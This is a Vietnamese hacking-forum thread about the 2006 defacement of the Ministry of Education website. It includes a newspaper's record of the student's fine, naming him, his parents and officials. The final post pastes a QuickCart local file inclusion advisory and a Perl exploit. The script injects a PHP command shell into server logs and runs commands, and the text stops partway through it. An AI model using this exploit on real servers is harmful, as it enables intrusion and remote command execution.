banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Forum Index Thảo luận thâm nhập Xin hỏi về lỗi của Bộ GDDT  XML
  [Discussion]   Xin hỏi về lỗi của Bộ GDDT 30/12/2006 10:03:02 (+0700) | #1 | 33421
[Avatar]
pthanhkim
Member

[Minus]    0    [Plus]
Joined: 06/03/2005 20:07:28
Messages: 27
Offline
[Profile] [PM]
Xin hỏi có ai biết về lỗ hổng của BGDDT mà Bui Minh Tri da su dung tren website http://www.moet.gov.vn/ khong ?
[Up] [Print Copy]
  [Question]   Xin hỏi về lỗi của Bộ GDDT 30/12/2006 19:44:05 (+0700) | #2 | 33470
anhdenday
HVA Friend

Joined: 11/01/2003 13:21:53
Messages: 25
Offline
[Profile] [PM]
SQL Inject
[Up] [Print Copy]
  [Question]   Xin hỏi về lỗi của Bộ GDDT 31/12/2006 02:47:59 (+0700) | #3 | 33490
[Avatar]
nhocbmt
Member

[Minus]    0    [Plus]
Joined: 26/06/2006 17:55:21
Messages: 75
Location: Ban Mê City
Offline
[Profile] [PM] [WWW]
Sao anhdenday biết nó bị sql inject ?

1. Nóa sài php ! Việc inject là rất khó khi ko biết cấu trúc db !

Theo tớ biết :

1. Local inclusion file
2. Bug từ fckeditor

Đã kiểm chứng smilie
[Up] [Print Copy]
  [Question]   Xin hỏi về lỗi của Bộ GDDT 31/12/2006 15:46:35 (+0700) | #4 | 33557
[Avatar]
nora
Elite Member

[Minus]    0    [Plus]
Joined: 20/09/2006 00:08:43
Messages: 360
Location: UK
Offline
[Profile] [PM]

anhdenday wrote:
SQL Inject 


user:
pasword:

http://www.moet.gov.vn/
[Up] [Print Copy]
  [Question]   Xin hỏi về lỗi của Bộ GDDT 31/12/2006 18:59:17 (+0700) | #5 | 33561
[Avatar]
pthanhkim
Member

[Minus]    0    [Plus]
Joined: 06/03/2005 20:07:28
Messages: 27
Offline
[Profile] [PM]

nhocbmt wrote:
Sao anhdenday biết nó bị sql inject ?

1. Nóa sài php ! Việc inject là rất khó khi ko biết cấu trúc db !

Theo tớ biết :

1. Local inclusion file
2. Bug từ fckeditor

Đã kiểm chứng smilie 


Yeah merci, mình cũng nghĩ không phải là dính SQL inject đâu. có lẽ bạn nhocbmt đúng rùi đó, anh em nhào vô nghiên cứu nhé.
[Up] [Print Copy]
  [Question]   Xin hỏi về lỗi của Bộ GDDT 01/01/2007 00:00:53 (+0700) | #6 | 33573
[Avatar]
nhocbmt
Member

[Minus]    0    [Plus]
Joined: 26/06/2006 17:55:21
Messages: 75
Location: Ban Mê City
Offline
[Profile] [PM] [WWW]
smilie nghiên cứu gì chài ! Chả có rì hay cả smilie
[Up] [Print Copy]
  [Question]   Xin hỏi về lỗi của Bộ GDDT 01/01/2007 05:07:41 (+0700) | #7 | 33615
[Avatar]
hoahongtim
Researcher

Joined: 15/07/2002 02:59:49
Messages: 156
Location: Underground
Offline
[Profile] [PM] [WWW] [Yahoo!]
Nhà đang cháy, nhảy vào thế nào cũng bị phỏng thôi! smilie
[Up] [Print Copy]
  [Question]   Xin hỏi về lỗi của Bộ GDDT 01/01/2007 15:02:20 (+0700) | #8 | 33678
[Avatar]
nora
Elite Member

[Minus]    0    [Plus]
Joined: 20/09/2006 00:08:43
Messages: 360
Location: UK
Offline
[Profile] [PM]

nora wrote:

anhdenday wrote:
SQL Inject 


user:
pasword:

http://www.moet.gov.vn/  


Last edited by PXMMRF at: 31/12/2006 12:14:09 


:?smilie
[Up] [Print Copy]
  [Question]   Xin hỏi về lỗi của Bộ GDDT 01/01/2007 22:01:39 (+0700) | #9 | 33697
[Avatar]
conmale
Administrator

Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
[Profile] [PM]

nora wrote:

nora wrote:

anhdenday wrote:
SQL Inject 


user:
pasword:

http://www.moet.gov.vn/  


Last edited by PXMMRF at: 31/12/2006 12:14:09 


:?smilie  


PXMMRF đã điều chỉnh để xoá một đoạn nhạy cảm đó thôi.
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]
  [Question]   Re: Xin hỏi về lỗi của Bộ GDDT 02/01/2007 11:53:39 (+0700) | #10 | 33820
[Avatar]
pthanhkim
Member

[Minus]    0    [Plus]
Joined: 06/03/2005 20:07:28
Messages: 27
Offline
[Profile] [PM]
Trùi ui Kim chưa kịp coi đã bị bác PXMMRF điều chỉnh hết trơn rùi đọc hông hiểu gì hết hix hix. Xóa kiểu này chắc mai mốt hết dám hỏi luôn quá hic hic smilie(
[Up] [Print Copy]
  [Question]   Re: Xin hỏi về lỗi của Bộ GDDT 02/01/2007 12:22:58 (+0700) | #11 | 33832
[Avatar]
smoonlight
Member

[Minus]    0    [Plus]
Joined: 17/12/2006 01:03:47
Messages: 10
Offline
[Profile] [PM]
pác hoa hồng tím nói đúng đấy.nhà đang cháy to, ta nên đứng ngoài xem thôi.nhào dzo không cẩn thận lĩnh sẹo đó.đừng dại... hi hi
[Up] [Print Copy]
  [Question]   Xin hỏi về lỗi của Bộ GDDT 02/01/2007 18:36:10 (+0700) | #12 | 33876
[Avatar]
nora
Elite Member

[Minus]    0    [Plus]
Joined: 20/09/2006 00:08:43
Messages: 360
Location: UK
Offline
[Profile] [PM]

conmale wrote:
SQL Inject


PXMMRF đã điều chỉnh để xoá một đoạn nhạy cảm đó thôi. 

 


Ui dào lỗi họ đã fix rùi, rào dậu hết rùi mà sư huynh
[Up] [Print Copy]
  [Question]   Xin hỏi về lỗi của Bộ GDDT 03/01/2007 07:56:42 (+0700) | #13 | 33987
[Avatar]
lihavim
Elite Member

[Minus]    0    [Plus]
Joined: 08/06/2004 15:19:32
Messages: 506
Offline
[Profile] [PM]

nora wrote:
Ui dào lỗi họ đã fix rùi, rào dậu hết rùi mà sư huynh 

Vậy mục đích của việc đưa lên là gì?
[Up] [Print Copy]
  [Question]   Xin hỏi về lỗi của Bộ GDDT 03/01/2007 08:27:38 (+0700) | #14 | 33992
shuichi_akai
Elite Member

[Minus]    0    [Plus]
Joined: 12/10/2003 10:40:06
Messages: 161
Location: /home
Offline
[Profile] [PM]

lihavim wrote:

nora wrote:
Ui dào lỗi họ đã fix rùi, rào dậu hết rùi mà sư huynh 

Vậy mục đích của việc đưa lên là gì?
 


Tò mò, "hôi của",... smilie
[Up] [Print Copy]
  [Question]   Xin hỏi về lỗi của Bộ GDDT 03/01/2007 14:40:28 (+0700) | #15 | 34047
[Avatar]
nora
Elite Member

[Minus]    0    [Plus]
Joined: 20/09/2006 00:08:43
Messages: 360
Location: UK
Offline
[Profile] [PM]

lihavim wrote:

nora wrote:
Ui dào lỗi họ đã fix rùi, rào dậu hết rùi mà sư huynh 

Vậy mục đích của việc đưa lên là gì?
 


Vậy mục đích của những câu hỏi để làm gì?
[Up] [Print Copy]
  [Question]   Xin hỏi về lỗi của Bộ GDDT 05/01/2007 05:08:58 (+0700) | #16 | 34359
[Avatar]
pthanhkim
Member

[Minus]    0    [Plus]
Joined: 06/03/2005 20:07:28
Messages: 27
Offline
[Profile] [PM]

shuichi_akai wrote:

lihavim wrote:

nora wrote:
Ui dào lỗi họ đã fix rùi, rào dậu hết rùi mà sư huynh 

Vậy mục đích của việc đưa lên là gì?
 


Tò mò, "hôi của",... smilie  


Nè nè Kim không phải vậy đâu mà nói nhé. Mục đích hỏi là tìm những trang khác để test thử, chứ nhà đang cháy nhảy vô cho chết chung hết ráo à ? Còn hôi của bạn hiểu sao là hôi của hử không nhẽ bạn học lại từ người khác cũng là hôi của à, nói năng cho cẩn thận nhé, trừ bạn 1 điểm smilie)
[Up] [Print Copy]
  [Question]   Xin hỏi về lỗi của Bộ GDDT 05/01/2007 05:58:30 (+0700) | #17 | 34368
quanlypho
Member

[Minus]    0    [Plus]
Joined: 01/07/2006 21:19:20
Messages: 95
Offline
[Profile] [PM]
Tưởng đâu là sẽ có "tài năng trẻ" mới nữa chứ; nhưng bác PXMMRF nhanh tay quá, nên chắc mấy bác SSP mất mấy cơ hội "khen thưởng tài năng trẻ" và "góp tiền cho nhân tài du học" rồi ^^
[Up] [Print Copy]
  [Question]   Xin hỏi về lỗi của Bộ GDDT 05/01/2007 06:22:47 (+0700) | #18 | 34373
boyhuesd
Member

[Minus]    0    [Plus]
Joined: 30/06/2006 17:46:03
Messages: 7
Location: Bụng mẹ! :D
Offline
[Profile] [PM] [Yahoo!]
cái này dùng php thì vẫn có lỗi chứ sao không
mà sao bác trí lại tìm ra lỗi tài nhầy
[Up] [Print Copy]
  [Question]   Re: Xin hỏi về lỗi của Bộ GDDT 05/01/2007 16:43:21 (+0700) | #19 | 34487
[Avatar]
pthanhkim
Member

[Minus]    0    [Plus]
Joined: 06/03/2005 20:07:28
Messages: 27
Offline
[Profile] [PM]
Tin tức từ báo tuổi trẻ online đây :

Biên bản xử lý vụ xâm nhập website Bộ GD-ĐT

Buổi họp xử lý vụ vi phạm hành chính của em Trí ngày 03-01-2007 - Ảnh: Quang Vinh
TTO - Ngày 03-1-2007, tại Sở Bưu chính viễn thông tỉnh Vĩnh Long, ông Nguyễn Thới Bình, giám đốc sở đã chủ trì buổi họp lấy ý kiến của đại diện cơ quan cảnh sát điều tra, nhà trường, gia đình và chất vấn trực tiếp em Bùi Minh Trí để xem xét trước khi đưa ra mức xử phạt hành chính. Để bạn đọc hiểu thêm vụ việc, chúng tôi xin đăng nguyên văn biên bản buổi làm việc nói trên.

>> Ngày 20-11 hay 27-11?
>> Trao đổi tiếp với Bộ trưởng Nguyễn Thiện Nhân

BIÊN BẢN LÀM VIỆC

V/v xử lý vi phạm hành chính em Trí vi phạm web Bộ GD-ĐT

Hôm nay, hồi 08g00, ngày 03 tháng 01 năm 2007

Tại Sở Bưu chính viễn thông tỉnh Vĩnh Long

Chúng tôi gồm:

1. Họ và tên: Nguyễn Thới Bình, chức vụ: Giám đốc Sở BCVT

2. Họ và tên: Lê Minh Thương, Phụ trách thanh tra Sở

3. Họ và tên: Nguyễn Văn Nguyên, CVTH

4. Họ và tên: Nguyễn Thùy Kha, CV Thanh tra

5. Họ và tên: Phạm Minh Hiền, Phó phòng PC15 CA tỉnh Vĩnh Long

6. Họ và tên: Nguyễn Hoàng Sang, Cán bộ phòng PC15

Làm việc với:

1. Họ và tên: Bùi Chí Hiếu, Hiệu trưởng trường Nguyễn Bỉnh Khiêm

2. Họ và tên: Bùi Thanh Hồng, bố em Trí

3. Họ và tên: Võ Thị Kim Phượng, mẹ em Trí

4. Họ và tên: Bùi Minh Trí, người vi phạm

Về các nội dung sau: (Ý kiến giữa các bên trình bày)

Ông Giám đốc Sở Bưu chính Viễn thông chủ trì họp giới thiệu nội dung làm việc, thành phần làm việc và các yêu cầu cần thiết trong quá trình làm việc:

- Làm việc cần chất vấn em Trí để làm rõ thêm về hành vi vi phạm

- Khi cần thiết, hội nghị xin ý kiến các thành phần khác

- Yêu cầu với em Trí là thành khẩn, trung thực để xem xét xử lý hợp tình hợp lý.

Chủ trì: yêu cầu em Trí cho biết:

Em có động cơ nào khi xâm nhập trang web của Bộ Giáo dục đào tạo? Khi xâm nhập dùng công cụ gì? Ngoài việc thay ảnh Bộ trưởng thì em còn làm gì nữa không?

Ý kiến em Trí: Em vào trang web Bộ Giáo dục đào tạo là để xem trang web có lỗi không và nếu có thì cảnh báo để sửa lỗi. Em vào trang web Bộ Giáo dục đào tạo bằng lỗi bảo mật và để lại Netcat. Tháng 7-2006, em vào web và để lại Netcat rồi sau đó quên không sử dụng. Lần vô sau, em thay ảnh để lại file tin index, html với ý cảnh báo như lần vào web như nhưng lần trước đó.

Về file tên là Guan.yu.html là file gì?

Em Trí trình bày: Guan.yu.html chỉ đơn thuần là tên file mà không phải là virus.

Về số lần em Trí vào trang web của Bộ Giáo dục đào tạo và thay ảnh Bộ trưởng thời gian nào? Trong bao lâu?

Em Trí trình bày: Em không nhớ chính xác số lần đã vào trang web Bộ Giáo dục đào tạo nhưng lần đầu tiên vào khoảng cuối tháng 7-2006. Em thay ảnh Bộ trưởng vào ngày 27-11-2006 trong khoảng từ 5 đến 15 phút.

Về việc để lại Netcat,

Em Trí trình bày: khi vào web Bộ GDĐT em có để lại Netcat và sau đó quên xóa chứ không có mục đích gì.

Khi em để lại file có ai ở Bộ GD-ĐT liên hệ với em không? Liên hệ bằng hình thức gì?

Em Trí trình bày: Đến ngày 11-12 có anh ở Bộ GD-ĐT liên lạc bằng hình thức chat với em, anh xưng tên là Tuấn (nhưng sau ngày 19-12 anh xưng là Kiên), nội dung là anh ấy nói cứ đưa cho anh ấy hướng lỗi để anh ấy tự xử lý.

Về việc nhận thức vi phạm ra sao.

Em Trí trình bày: Việc làm của em là sai trái, trước hết đó là thay ảnh thầy Bộ trưởng em đã vô lễ với thầy. Thứ hai là em đã xâm nhập trái phép vào trang web của Bộ là vi phạm quy định của nhà nước. Tuy nhiên em hoàn toàn không có mục đích xấu.

Về việc trước đây em đã vào trang web nào chưa?

Em Trí trình bày: Trước khi vào trang web của Bộ GD-ĐT thì em đã vào một số trang web khác báo lỗi và hợp tác sửa lỗi với họ.

Về việc em có biết vi phạm luật khi vào trang web không?

Em Trí trình bày: Em không ý thức được trước khi vào trang web là việc vào trang web là hành vi vi phạm luật.

Về việc vào trang web em có tham gia cùng nhóm nào không?

Em Trí trình bày là em chỉ làm một mình và cũng không có tham gia tổ chức hay nhóm nào cả.

Ý kiến thầy hiệu trưởng:

Nhà trường thấy em Trí là học sinh giỏi, có đạo đức, rất hoan nghênh cơ quan chức năng đưa vụ việc ra xử lý hành chánh. Em Trí có lỗi, nhà trường cũng có trách nhiệm, trước nay nhà trường chỉ có cảnh báo học sinh những tác động xấu từ trang web mà chưa có giáo dục pháp luật liên quan cho học sinh. Nhà trường cũng đã nhận được tự kiểm của em Trí, trong kiểm điểm em Trí thành khẩn nhận lỗi nhưng phạm vi nhà trường chỉ xử lý hành vi đạo đức của học sinh Trí khi thay ảnh thầy Bộ trưởng.

Ý kiến gia đình:

Gia đình rất lấy làm tiếc, xin nhận khuyết điểm khi chưa sâu sát trong việc giáo dục con mình. Gia đình hứa sẽ quan tâm hơn nữa việc giáo dục con nên người và đề nghị cơ quan chức năng xem xét hành vi của cháu trong điểu kiện xét sự nông nổi, sự vô tình của cháu để xử lý cháu sao cho không bị ảnh hưởng đến học tập, thi cử.

Kết luận của chủ trì:

Việc em Trí vi phạm trang web của Bộ GD-ĐT là hành vi vi phạm pháp luật. Qua xem xét các tình tiết:

- Em Trí là một học sinh giỏi, hạnh kiểm tốt, gia đình chấp hành chủ trương chính sách của Đảng và Nhà nước tốt.

- Em có năng lực, trình độ về tin học, say mê tìm hiểu và ý thức pháp luật còn non kém nên đã vi phạm.

- Sau khi vi phạm, em Trí thật thà khai báo, hợp tác với cơ quan điều tra.

Những tình tiết trên là rất quan trọng khi xem xét xử lý sao cho em Trí rút ra được bài học cho mình và thể hiện được sự nghiêm minh của pháp luật. Xử lý em Trí còn nhằm để cảnh báo chung, răn đe giáo dục. Do vậy áp dụng các điểm g, k khoản 5 điều 41 Nghị định 55 của Chính phủ xử phạt vi phạm hành chính em Trí là phù hợp. Sở xem xét áp dụng mức phạt hành chính thấp nhất của hành vi này là 10 triệu đồng.

Buổi làm việc kết thúc hồi 10g cùng ngày. Biên bản gồm có 5 trang, đã đọc lại cho các bên cùng nghe và cùng ký tên.

Người được mời Người chủ trì Người lập biên bản

Bùi Minh Trí Nguyễn Thới Bình Nguyễn Văn Nguyên


Mất 10 chai đáng buồn thật = con yahoo gái xinh hix hix. Lần này cho anh em rút kinh nghiệm mấy web site nhạy cảm thì đừng phá nhé smilie)
Có 1 điều hơi théc méc là tại sao Bùi Minh Trí không để thêm bản nhạc trong Album Secrect Garden nhỉ cho giống với hì hì.net smilie
[Up] [Print Copy]
  [Question]   Re: Xin hỏi về lỗi của Bộ GDDT 05/01/2007 18:33:44 (+0700) | #20 | 34494
doikengheo
HVA Friend

Joined: 31/05/2005 05:51:51
Messages: 486
Location: Đâu nhỉ?
Offline
[Profile] [PM]

pthanhkim wrote:
Tin tức từ báo tuổi trẻ online đây :

Biên bản xử lý vụ xâm nhập website Bộ GD-ĐT

Buổi họp xử lý vụ vi phạm hành chính của em Trí ngày 03-01-2007 - Ảnh: Quang Vinh
TTO - Ngày 03-1-2007, tại Sở Bưu chính viễn thông tỉnh Vĩnh Long, ông Nguyễn Thới Bình, giám đốc sở đã chủ trì buổi họp lấy ý kiến của đại diện cơ quan cảnh sát điều tra, nhà trường, gia đình và chất vấn trực tiếp em Bùi Minh Trí để xem xét trước khi đưa ra mức xử phạt hành chính. Để bạn đọc hiểu thêm vụ việc, chúng tôi xin đăng nguyên văn biên bản buổi làm việc nói trên.

>> Ngày 20-11 hay 27-11?
>> Trao đổi tiếp với Bộ trưởng Nguyễn Thiện Nhân

BIÊN BẢN LÀM VIỆC

V/v xử lý vi phạm hành chính em Trí vi phạm web Bộ GD-ĐT

Hôm nay, hồi 08g00, ngày 03 tháng 01 năm 2007

Tại Sở Bưu chính viễn thông tỉnh Vĩnh Long

Chúng tôi gồm:

1. Họ và tên: Nguyễn Thới Bình, chức vụ: Giám đốc Sở BCVT

2. Họ và tên: Lê Minh Thương, Phụ trách thanh tra Sở

3. Họ và tên: Nguyễn Văn Nguyên, CVTH

4. Họ và tên: Nguyễn Thùy Kha, CV Thanh tra

5. Họ và tên: Phạm Minh Hiền, Phó phòng PC15 CA tỉnh Vĩnh Long

6. Họ và tên: Nguyễn Hoàng Sang, Cán bộ phòng PC15

Làm việc với:

1. Họ và tên: Bùi Chí Hiếu, Hiệu trưởng trường Nguyễn Bỉnh Khiêm

2. Họ và tên: Bùi Thanh Hồng, bố em Trí

3. Họ và tên: Võ Thị Kim Phượng, mẹ em Trí

4. Họ và tên: Bùi Minh Trí, người vi phạm

Về các nội dung sau: (Ý kiến giữa các bên trình bày)

Ông Giám đốc Sở Bưu chính Viễn thông chủ trì họp giới thiệu nội dung làm việc, thành phần làm việc và các yêu cầu cần thiết trong quá trình làm việc:

- Làm việc cần chất vấn em Trí để làm rõ thêm về hành vi vi phạm

- Khi cần thiết, hội nghị xin ý kiến các thành phần khác

- Yêu cầu với em Trí là thành khẩn, trung thực để xem xét xử lý hợp tình hợp lý.

Chủ trì: yêu cầu em Trí cho biết:

Em có động cơ nào khi xâm nhập trang web của Bộ Giáo dục đào tạo? Khi xâm nhập dùng công cụ gì? Ngoài việc thay ảnh Bộ trưởng thì em còn làm gì nữa không?

Ý kiến em Trí: Em vào trang web Bộ Giáo dục đào tạo là để xem trang web có lỗi không và nếu có thì cảnh báo để sửa lỗi. Em vào trang web Bộ Giáo dục đào tạo bằng lỗi bảo mật và để lại Netcat. Tháng 7-2006, em vào web và để lại Netcat rồi sau đó quên không sử dụng. Lần vô sau, em thay ảnh để lại file tin index, html với ý cảnh báo như lần vào web như nhưng lần trước đó.

Về file tên là Guan.yu.html là file gì?

Em Trí trình bày: Guan.yu.html chỉ đơn thuần là tên file mà không phải là virus.

Về số lần em Trí vào trang web của Bộ Giáo dục đào tạo và thay ảnh Bộ trưởng thời gian nào? Trong bao lâu?

Em Trí trình bày: Em không nhớ chính xác số lần đã vào trang web Bộ Giáo dục đào tạo nhưng lần đầu tiên vào khoảng cuối tháng 7-2006. Em thay ảnh Bộ trưởng vào ngày 27-11-2006 trong khoảng từ 5 đến 15 phút.

Về việc để lại Netcat,

Em Trí trình bày: khi vào web Bộ GDĐT em có để lại Netcat và sau đó quên xóa chứ không có mục đích gì.

Khi em để lại file có ai ở Bộ GD-ĐT liên hệ với em không? Liên hệ bằng hình thức gì?

Em Trí trình bày: Đến ngày 11-12 có anh ở Bộ GD-ĐT liên lạc bằng hình thức chat với em, anh xưng tên là Tuấn (nhưng sau ngày 19-12 anh xưng là Kiên), nội dung là anh ấy nói cứ đưa cho anh ấy hướng lỗi để anh ấy tự xử lý.

Về việc nhận thức vi phạm ra sao.

Em Trí trình bày: Việc làm của em là sai trái, trước hết đó là thay ảnh thầy Bộ trưởng em đã vô lễ với thầy. Thứ hai là em đã xâm nhập trái phép vào trang web của Bộ là vi phạm quy định của nhà nước. Tuy nhiên em hoàn toàn không có mục đích xấu.

Về việc trước đây em đã vào trang web nào chưa?

Em Trí trình bày: Trước khi vào trang web của Bộ GD-ĐT thì em đã vào một số trang web khác báo lỗi và hợp tác sửa lỗi với họ.

Về việc em có biết vi phạm luật khi vào trang web không?

Em Trí trình bày: Em không ý thức được trước khi vào trang web là việc vào trang web là hành vi vi phạm luật.

Về việc vào trang web em có tham gia cùng nhóm nào không?

Em Trí trình bày là em chỉ làm một mình và cũng không có tham gia tổ chức hay nhóm nào cả.

Ý kiến thầy hiệu trưởng:

Nhà trường thấy em Trí là học sinh giỏi, có đạo đức, rất hoan nghênh cơ quan chức năng đưa vụ việc ra xử lý hành chánh. Em Trí có lỗi, nhà trường cũng có trách nhiệm, trước nay nhà trường chỉ có cảnh báo học sinh những tác động xấu từ trang web mà chưa có giáo dục pháp luật liên quan cho học sinh. Nhà trường cũng đã nhận được tự kiểm của em Trí, trong kiểm điểm em Trí thành khẩn nhận lỗi nhưng phạm vi nhà trường chỉ xử lý hành vi đạo đức của học sinh Trí khi thay ảnh thầy Bộ trưởng.

Ý kiến gia đình:

Gia đình rất lấy làm tiếc, xin nhận khuyết điểm khi chưa sâu sát trong việc giáo dục con mình. Gia đình hứa sẽ quan tâm hơn nữa việc giáo dục con nên người và đề nghị cơ quan chức năng xem xét hành vi của cháu trong điểu kiện xét sự nông nổi, sự vô tình của cháu để xử lý cháu sao cho không bị ảnh hưởng đến học tập, thi cử.

Kết luận của chủ trì:

Việc em Trí vi phạm trang web của Bộ GD-ĐT là hành vi vi phạm pháp luật. Qua xem xét các tình tiết:

- Em Trí là một học sinh giỏi, hạnh kiểm tốt, gia đình chấp hành chủ trương chính sách của Đảng và Nhà nước tốt.

- Em có năng lực, trình độ về tin học, say mê tìm hiểu và ý thức pháp luật còn non kém nên đã vi phạm.

- Sau khi vi phạm, em Trí thật thà khai báo, hợp tác với cơ quan điều tra.

Những tình tiết trên là rất quan trọng khi xem xét xử lý sao cho em Trí rút ra được bài học cho mình và thể hiện được sự nghiêm minh của pháp luật. Xử lý em Trí còn nhằm để cảnh báo chung, răn đe giáo dục. Do vậy áp dụng các điểm g, k khoản 5 điều 41 Nghị định 55 của Chính phủ xử phạt vi phạm hành chính em Trí là phù hợp. Sở xem xét áp dụng mức phạt hành chính thấp nhất của hành vi này là 10 triệu đồng.

Buổi làm việc kết thúc hồi 10g cùng ngày. Biên bản gồm có 5 trang, đã đọc lại cho các bên cùng nghe và cùng ký tên.

Người được mời Người chủ trì Người lập biên bản

Bùi Minh Trí Nguyễn Thới Bình Nguyễn Văn Nguyên


Mất 10 chai đáng buồn thật = con yahoo gái xinh hix hix. Lần này cho anh em rút kinh nghiệm mấy web site nhạy cảm thì đừng phá nhé smilie)
Có 1 điều hơi théc méc là tại sao Bùi Minh Trí không để thêm bản nhạc trong Album Secrect Garden nhỉ cho giống với hì hì.net smilie
 


Có cần thiết phài show đoạn này lên không bạn?
Đi một ngày đàng học một sàng dại

Sàng đi sàng lại lấy một tí khôn


http://vietload.com
kho phần mềm trực tuyến
[Up] [Print Copy]
  [Question]   Xin hỏi về lỗi của Bộ GDDT 06/01/2007 05:30:48 (+0700) | #21 | 34587
BigballVN
Elite Member

[Minus]    0    [Plus]
Joined: 12/06/2005 07:25:21
Messages: 610
Offline
[Profile] [PM]
1 chút danh tiếng + 1 chút cc hack đc giờ chịu hậu quả như vầy có đáng không????
[Up] [Print Copy]
  [Question]   Re: Xin hỏi về lỗi của Bộ GDDT 06/01/2007 21:24:52 (+0700) | #22 | 34683
[Avatar]
pthanhkim
Member

[Minus]    0    [Plus]
Joined: 06/03/2005 20:07:28
Messages: 27
Offline
[Profile] [PM]
Search Google được thông tin về Local Inclusion File cho chị em ta :

Code:
#################################################################################################
#                                    r0ut3r Presents...                                         #
#                                                                                               #
#                                Another r0ut3r discovery!                                      #
#                                  writ3r [at] gmail.com                                        #
#                                                                                               #
#                        QuickCart 2.0 Local File Inclusion Exploit                             #
#################################################################################################
# Software: QuickCart 2.0                                                                       #
#                                                                                               #
# Vendor: http://opensolution.org/                                                              #
#                                                                                               #
# Released: 2006/12/03                                                                          #
#                                                                                               #
# Critical: Moderately crtical                                                                  #
#                                                                                               #
# Discovered & Exploit By: r0ut3r (writ3r [at] gmail.com)                                       #
#                                                                                               #
# Note: The information provided in this document is for Quick Cart administrator               #
# testing purposes only!                                                                        #
#                                                                                               #
# register_globals must be on                                                                   #
# gpc_magic_quotes must be off                                                                  #
#                                                                                               #
# actions_admin/categories.php?config[db_type]=                                                 #
# actions_admin/couriers.php?config[db_type]=                                                   #
# actions_admin/orders.php?config[db_type]=                                                     #
# actions_admin/products.php?config[db_type]=                                                   #
# actions_client/products.php?config[db_type]=                                                  #
# actions_client/orders.php?config[db_type]=                                                    #
#                                                                                               #
# Vulnerable code:                                                                              #
# require_once DIR_CORE.'couriers-'.$config['db_type'].'.php';                                  #
#                                                                                               #
# Patch: (Place this code at the top of every file)                                             #
# if(basename(__FILE__) == basename($_SERVER['PHP_SELF']))                                      #
#    die();                                                                                     #
#                                                                                               #
# Exploit: categories.php?config[db_type]=../../../../../../../../../../../etc/passwd%00        #
# Usage: perl localfilexpl.pl 127.0.0.1  actions_admin/categories.php?config[db_type]=          #
#################################################################################################

############################################################################
#                   Local File Inclusion Exploiter                         #
#                                                                          #
# This script attempts to exploit a local file include vulnerability       #
# by finding a readable http log file, then by sending a specially crafted #
# http request to the server in order to insert a PHP Shell into the       #
# log files. A shell is then spawned.                                      #
#                                                                          #
# Created By r0ut3r (writ3r [at] gmail.com)                                #
############################################################################

use IO::Socket;
use Switch;

$port = "80"; # connection port
$target = @ARGV[0]; # localhost
$vulnf = @ARGV[1]; # /include/WBmap.php?l=
$opt = @ARGV[2]; # -p (not needed)

sub Header()
{
        print q {Local File Inclusion Exploiter - By r0ut3r (writ3r [at]
gmail.com)
-------------------------------------------------------------------
};
}

sub Usage()
{
        print q {Usage: localfilexpl.pl [target] [folder & vulnerable file]
[opt]
Example: localfilexpl.pl localhost /include/WBmap.php?l= -p
opt = -p (To print recieved content)
};
        exit();
}

Header();

if (!$target || !$vulnf) {
        Usage(); }

@targets = (
"var/log/httpd/access_log",
"var/log/httpd/error_log",
"var/log/access_log",
"var/log/error_log",
"var/www/logs/access.log",
"var/www/logs/access_log",
"var/www/logs/error_log",
"var/www/logs/error.log",
"apache/logs/access_log",
"apache/logs/error.log",
"etc/httpd/logs/access.log",
"etc/httpd/logs/access_log",
"etc/httpd/logs/error.log",
"etc/httpd/logs/error_log",
"usr/local/apache/logs/access.log",
"usr/local/apache/logs/access_log",
"usr/local/apache/logs/error.log",
"usr/local/apache/logs/error_log",
"var/log/apache2/error_log",
"var/log/apache2/error.log",
"var/log/apache2/access_log",
"var/log/apache2/access.log",
"access_log",
);

@paths = ();
$dirs = 5;
$count = 0;

foreach $target (@targets)
{
        for(0..$dirs){
                $paths[$count+$_] = "../"x$_ . $target;
        }
        $count += $dirs;
}

print "[+] Attempting to locate log file\n";
$log = "";
foreach $path (@paths)
{
#print "$path\n";
        $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $target,
PeerPort => $port) || die "[-] Failed to connect. Exiting...\r\n";
        print $sock "GET ".$vulnf.$path."%00 HTTP/1.1\n";
        print $sock "Host: $target\n";
        print $sock "User-Agent: Googlebot/2.1
(+http://www.google.com/bot.html)\n";
        print $sock "Accept: text/html\n";
        print $sock "Connection: close\n\n\r\n";

        while (<$sock>)
        {
                if (/<title>404 Not Found/)
                {
                        print "[-] Vulnerable file not found! Exiting... \n";
                        exit();
                }

                if (/Permission denied/) {
                        print "[-] Log file found, but permission was denied
to read file. [".$path."] \n"; }

                if (/(.*?).(.*?).(.*?).(.*?) - - \[(.*?)/)
                {
                        if ($path ne $log) {
                                print "[+] Log file found! [".$path."] \n"; }
                        $log = $path;
                }
        }
}

if ($log eq "") {
print "[-] Log file not found. Exiting...\n"; exit(); }

$cmdfunct = "system";
print "[+] Inserting PHP Shell into logs\n";
$code = "<?php ob_clean(); echo 'r0ut3r - Local File Include Expoiter '; echo
".$cmdfunct."(\$_GET['cmd']); die(); ?>";
$xpl = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $target, PeerPort =>
$port) || die "[-] Failed to connect. Exiting...\r\n";
print $xpl "GET /".$code." HTTP/1.1\n";
print $xpl "Host: $target\n";
print $xpl "User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)\n";
print $xpl "Accept: text/html\n";
print $xpl "Connection: close\n\n\r\n";

@cmdfunctions = ("exec", "shell_exec", "passthru");
$enabled_funct = false;

$xpl_test = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $target,
PeerPort => $port) || die "[-] Failed to connect. Exiting...\r\n";
print $xpl_test "GET ".$vulnf.$path.$log."%00&cmd=dir HTTP/1.1\n";
print $xpl_test "Host: $target\n";
print $xpl_test "User-Agent: Googlebot/2.1
(+http://www.google.com/bot.html)\n";
print $xpl_test "Accept: text/html\n";
print $xpl_test "Connection: close\n\n\r\n";

while (<$xpl_test>)
{
        if (/system\(\) has been disabled for security/)
        {
                print "[-] system() function is disabled. \n";
                foreach $cmdfunct (@cmdfunctions)
                {
                        if ($enabled_funct eq false)
                        {
                                print "[+] Trying ".$cmdfunct."()\n";
                                $code = "<?php ob_clean(); echo 'r0ut3r - Local File Include Expoiter '; echo ".$cmdfunct."(\$_GET['cmd']); die(); ?>";
